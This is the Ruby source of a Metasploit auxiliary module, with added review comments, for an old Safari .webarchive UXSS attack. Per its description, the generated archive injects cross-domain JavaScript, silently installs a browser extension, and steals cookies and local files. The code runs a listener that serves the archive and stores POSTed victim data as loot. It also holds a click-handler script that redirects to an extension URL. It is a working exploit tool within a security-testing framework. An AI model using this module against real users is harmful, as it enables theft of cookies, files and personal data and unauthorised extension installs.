rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'uri'
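# Auxiliary module that writes a Safari .webarchive file to disk and then runs
# an HTTP listener which serves the same archive on GET and stores whatever a
# client POSTs back as loot.
#
# Review notes:
# - Per the module description, a webarchive that still carries the quarantine
#   attribute is opened in a sandbox; keeping quarantine metadata on downloaded
#   files is therefore the relevant control on the client side.
# - Everything arriving in a POST body is untrusted input to this listener; see
#   #on_request_uri and #record_data for how it is parsed and named.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Format::Webarchive
  include Msf::Auxiliary::Report

  # Registers the module metadata (name, description, references, actions).
  #
  # @param [Hash] info metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Mac OS X Safari .webarchive File Format UXSS',
        'Description' => %q{
          Generates a .webarchive file for Mac OS X Safari that will attempt to
          inject cross-domain Javascript (UXSS), silently install a browser
          extension, collect user information, steal the cookie database,
          and steal arbitrary local files.

          When opened on the target machine the webarchive file must not have the
          quarantine attribute set, as this forces the webarchive to execute in a
          sandbox.
        },
        'License' => MSF_LICENSE,
        'Author' => 'joev',
        'References' => [
          ['URL', 'https://www.rapid7.com/blog/post/2013/04/25/abusing-safaris-webarchive-file-format/']
        ],
        'DisclosureDate' => '2013-02-22',
        'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
        'PassiveActions' => [ 'WebServer' ],
        'DefaultAction' => 'WebServer',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Entry point: picks a random URIPATH when none is configured, writes the
  # archive to FILENAME, then starts the HTTP listener via `exploit`.
  def run
    if datastore["URIPATH"].blank?
      # "/" followed by 6..15 random alphanumeric characters.
      datastore["URIPATH"] = "/" + Rex::Text.rand_text_alphanumeric(rand(10) + 6)
    end

    print_status("Creating '#{datastore['FILENAME']}' file...")
    file_create(webarchive_xml)
    exploit
  end

  # Handles one HTTP request to the listener.
  #
  # A request whose method matches /post/i (an unanchored, case-insensitive
  # match) is treated as a data upload: the body is parsed as JSON and stored
  # through #record_data. A body that is not valid JSON is stored verbatim
  # instead of being dropped. Any other method is answered with the archive as
  # an `application/x-webarchive` attachment.
  #
  # @param cli the client connection object passed in by the HTTP server mixin
  # @param request the parsed HTTP request
  def on_request_uri(cli, request)
    if request.method =~ /post/i
      # to_s guarantees a String, so no nil fallback is needed before parsing.
      data_str = request.body.to_s
      begin
        data = JSON.parse(data_str)
        file = record_data(data, cli)
        send_response_html(cli, '')
        print_good "#{data_str.length} chars received and stored to #{file}"
      rescue JSON::ParserError # json error, dismiss request & keep crit. server up
        file = record_data(data_str, cli)
        print_error "Invalid JSON stored in #{file}"
        send_response_html(cli, '')
      end
    else
      send_response(cli, webarchive_xml, {
        'Content-Type' => 'application/x-webarchive',
        'Content-Disposition' => "attachment; filename=\"#{datastore['FILENAME']}\""
      })
    end
  end

  # Stores a received payload as loot.
  #
  # When the payload is a Hash, the loot type is derived from its first key:
  # the key is reduced to its basename and every character outside A-Za-z is
  # removed. The key comes from the client, so it is handled defensively:
  # - an empty Hash has no first key, and File.basename(nil) would raise a
  #   TypeError that #on_request_uri does not rescue;
  # - a key containing a NUL byte would make File.basename raise
  #   ArgumentError, so NUL bytes are dropped first (the filter would have
  #   removed them anyway, so the resulting name is unchanged);
  # - a key with no ASCII letters filters down to "", which is truthy in Ruby
  #   and would have been passed on as an empty loot type.
  # In all of those cases, and for non-Hash payloads, the type is "data".
  #
  # @param [Hash] data the data to store in the log
  # @param cli the client connection; its peerhost is recorded with the loot
  # @return [String] filename where we are storing the data (the return value
  #   of store_loot)
  def record_data(data, cli)
    loot_type = 'data'

    if data.is_a?(Hash) && !data.empty?
      first_key = data.keys.first.to_s.delete("\0")
      candidate = File.basename(first_key).gsub(/[^A-Za-z]/, '')
      loot_type = candidate unless candidate.empty?
    end

    store_loot(
      loot_type, "text/plain", cli.peerhost, data, "safari_webarchive", "Webarchive Collected Data"
    )
  end

  # Builds the URL of this listener's "catch" endpoint from the datastore.
  #
  # SRVHOST '0.0.0.0' is replaced by Rex::Socket.source_address, and the port
  # is omitted only when it is 80.
  # NOTE(review): URIPATH is interpolated after a literal "/", so a URIPATH that
  # already starts with "/" (as the one generated in #run does) yields "//" in
  # the result. Left unchanged; confirm whether consumers rely on this.
  #
  # @return [String] formatted http/https URL of the listener
  def backend_url
    proto = (datastore["SSL"] ? "https" : "http")
    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
    port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
    "#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch"
  end

  # Extends the inherited message with a link and the script from #popup_js
  # when the INSTALL_EXTENSION option is set; otherwise returns it unchanged.
  #
  # @return [String] the message markup
  def message
    super + (datastore['INSTALL_EXTENSION'] ? " <a href='javascript:void(0)'>Click here to continue.</a>" + popup_js : '')
  end

  # Returns the click-handler script, wrapped by wrap_with_script.
  # apple_extension_url is not defined in this file; presumably it comes from
  # one of the included mixins.
  #
  # @return [String] the wrapped script
  def popup_js
    wrap_with_script do
      %Q|
        window.onclick = function() {
          window.open('data:text/html,<script>opener.postMessage("EXT", "*");window.location="#{apple_extension_url}";<\\/script>');
        };
      |
    end
  end

end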